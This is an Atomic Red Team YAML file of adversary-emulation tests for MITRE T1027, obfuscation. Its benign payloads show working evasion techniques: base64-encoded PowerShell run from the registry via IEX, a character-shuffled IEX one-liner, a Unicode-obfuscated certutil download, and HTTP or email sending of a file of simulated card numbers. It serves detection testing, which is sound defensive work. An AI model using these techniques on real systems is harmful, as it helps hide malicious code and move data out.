atomic-red-team/atomics/T1027/T1027.yaml

attack_technique: T1027
display_name: Obfuscated Files or Information
atomic_tests:
- name: Decode base64 Data into Script
  auto_generated_guid: f45df6be-2e1e-4136-a384-8f18ab3826fb
  description: |
    Creates a base64-encoded data file and decodes it into an executable shell script

    Upon successful execution, sh will execute art.sh, which is a base64 encoded command, that stdouts `echo Hello from the Atomic Red Team`.
  supported_platforms:
  - macos
  - linux
  executor:
    command: |
      sh -c "echo ZWNobyBIZWxsbyBmcm9tIHRoZSBBdG9taWMgUmVkIFRlYW0= > /tmp/encoded.dat"
      cat /tmp/encoded.dat | base64 -d > /tmp/art.sh
      chmod +x /tmp/art.sh
      /tmp/art.sh
    name: sh
- name: Execute base64-encoded PowerShell
  auto_generated_guid: a50d5a97-2531-499e-a1de-5544c74432c6
  description: |
    Creates base64-encoded PowerShell code and executes it. This is used by numerous adversaries and malicious tools.

    Upon successful execution, powershell will execute an encoded command and stdout default is "Write-Host "Hey, Atomic!"
  supported_platforms:
  - windows
  input_arguments:
    powershell_command:
      description: PowerShell command to encode
      type: String
      default: Write-Host "Hey, Atomic!"
  executor:
    command: |
      $OriginalCommand = '#{powershell_command}'
      $Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)
      $EncodedCommand =[Convert]::ToBase64String($Bytes)
      $EncodedCommand
      powershell.exe -EncodedCommand $EncodedCommand
    name: powershell
- name: Execute base64-encoded PowerShell from Windows Registry
  auto_generated_guid: 450e7218-7915-4be4-8b9b-464a49eafcec
  description: |
    Stores base64-encoded PowerShell code in the Windows Registry and deobfuscates it for execution. This is used by numerous adversaries and malicious tools.

    Upon successful execution, powershell will execute encoded command and read/write from the registry.
  supported_platforms:
  - windows
  input_arguments:
    registry_key_storage:
      description: Windows Registry Key to store code
      type: String
      default: HKCU:Software\Microsoft\Windows\CurrentVersion
    powershell_command:
      description: PowerShell command to encode
      type: String
      default: Write-Host "Hey, Atomic!"
    registry_entry_storage:
      description: Windows Registry entry to store code under key
      type: String
      default: Debug
  executor:
    command: |
      $OriginalCommand = '#{powershell_command}'
      $Bytes = [System.Text.Encoding]::Unicode.GetBytes($OriginalCommand)
      $EncodedCommand =[Convert]::ToBase64String($Bytes)
      $EncodedCommand

      Set-ItemProperty -Force -Path #{registry_key_storage} -Name #{registry_entry_storage} -Value $EncodedCommand
      powershell.exe -Command "IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp #{registry_key_storage} #{registry_entry_storage}).#{registry_entry_storage})))"
    cleanup_command: |
      Remove-ItemProperty -Force -ErrorAction Ignore -Path #{registry_key_storage} -Name #{registry_entry_storage}
    name: powershell
- name: Execution from Compressed File
  auto_generated_guid: f8c8a909-5f29-49ac-9244-413936ce6d1f
  description: |
    Mimic execution of compressed executable. When successfully executed, calculator.exe will open.
  supported_platforms:
  - windows
  input_arguments:
    url_path:
      description: url to download Exe
      type: Url
      default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027/bin/T1027.zip
  dependency_executor_name: powershell
  dependencies:
  - description: |
      T1027.exe must exist on disk at $env:temp\temp_T1027.zip\T1027.exe
    prereq_command: |
      if (Test-Path $env:temp\temp_T1027.zip\T1027.exe) {exit 0} else {exit 1}
    get_prereq_command: |
      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
      Invoke-WebRequest "#{url_path}" -OutFile "$env:temp\T1027.zip"
      Expand-Archive -path "$env:temp\T1027.zip" -DestinationPath "$env:temp\temp_T1027.zip\" -Force
  executor:
    command: |
      "%temp%\temp_T1027.zip\T1027.exe"
    cleanup_command: |
      taskkill /f /im calculator.exe >nul 2>nul
      rmdir /S /Q %temp%\temp_T1027.zip >nul 2>nul
      del /Q "%temp%\T1027.zip" >nul 2>nul
    name: command_prompt
- name: DLP Evasion via Sensitive Data in VBA Macro over email
  auto_generated_guid: 129edb75-d7b8-42cd-a8ba-1f3db64ec4ad
  description: |
    Upon successful execution, an excel containing VBA Macro containing sensitive data will be sent outside the network using email.
    Sensitive data includes about around 20 odd simulated credit card numbers that passes the LUHN check.
  supported_platforms:
  - windows
  input_arguments:
    input_file:
      description: Path of the XLSM file
      type: Path
      default: PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm
    sender:
      description: sender email
      type: String
      default: test@corp.com
    receiver:
      description: receiver email
      type: String
      default: test@corp.com
    smtp_server:
      description: SMTP Server IP Address
      type: String
      default: 127.0.0.1
  executor:
    command: |
      Send-MailMessage -From #{sender} -To #{receiver} -Subject 'T1027_Atomic_Test' -Attachments #{input_file} -SmtpServer #{smtp_server}
    name: powershell
- name: DLP Evasion via Sensitive Data in VBA Macro over HTTP
  auto_generated_guid: e2d85e66-cb66-4ed7-93b1-833fc56c9319
  description: |
    Upon successful execution, an excel containing VBA Macro containing sensitive data will be sent outside the network using HTTP.
    Sensitive data includes about around 20 odd simulated credit card numbers that passes the LUHN check.
  supported_platforms:
  - windows
  input_arguments:
    input_file:
      description: Path of the XLSM file
      type: Path
      default: PathToAtomicsFolder\T1027\src\T1027-cc-macro.xlsm
    ip_address:
      description: Destination IP address
      type: String
      default: 127.0.0.1
  executor:
    command: |
      Invoke-WebRequest -Uri #{ip_address} -Method POST -Body #{input_file}
    name: powershell
- name: Obfuscated Command in PowerShell
  auto_generated_guid: 8b3f4ed6-077b-4bdd-891c-2d237f19410f
  description: |
    This is an obfuscated PowerShell command which when executed prints "Hello, from PowerShell!". Example is from the 2021 Threat Detection Report by Red Canary.
  supported_platforms:
  - windows
  executor:
    command: |
      $cmDwhy =[TyPe]("{0}{1}" -f 'S','TrING')  ;   $pz2Sb0  =[TYpE]("{1}{0}{2}"-f'nv','cO','ert')  ;  &("{0}{2}{3}{1}{4}" -f'In','SiO','vOKe-EXp','ReS','n') (  (&("{1}{2}{0}"-f'blE','gET-','vaRIA')  ('CMdw'+'h'+'y'))."v`ALUe"::("{1}{0}" -f'iN','jO').Invoke('',( (127, 162,151, 164,145 ,55 , 110 ,157 ,163 , 164 ,40,47, 110 , 145 ,154, 154 ,157 , 54 ,40, 146, 162 , 157,155 ,40, 120, 157 ,167,145 , 162 ,123,150 ,145 , 154 , 154 , 41,47)| .('%') { ( [CHAR] (  $Pz2sB0::"t`OinT`16"(( [sTring]${_}) ,8)))})) )
    name: powershell
- name: Obfuscated Command Line using special Unicode characters
  auto_generated_guid: e68b945c-52d0-4dd9-a5e8-d173d70c448f
  description: |
    This is an obfuscated certutil command that when executed downloads a file from the web. Adapted from T1105. Obfuscation includes special options chars (unicode hyphens), character substitution (e.g. ᶠ) and character insertion (including the usage of the right-to-left 0x202E and left-to-right 0x202D override characters).
    Reference:
    https://wietze.github.io/blog/windows-command-line-obfuscation
  supported_platforms:
  - windows
  input_arguments:
    remote_file:
      description: URL of file to download
      type: Url
      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt
    local_path:
      description: Local path/filename to save the dowloaded file to
      type: Path
      default: Atomic-license.txt
  executor:
    steps: |
      1. Copy the following command into the command prompt after replacing #{remote_file} and #{local_path} with your desired URL and filename.


        certutil —ૹu૰rlࢰca࣢c෯he  –‮spli؅t‮‭ −"൏ᶠ൸" #{remote_file} #{local_path}


      2. Press enter to execute the command. You will find the file or webpage you specified saved to the file you specified in the command.

    name: manual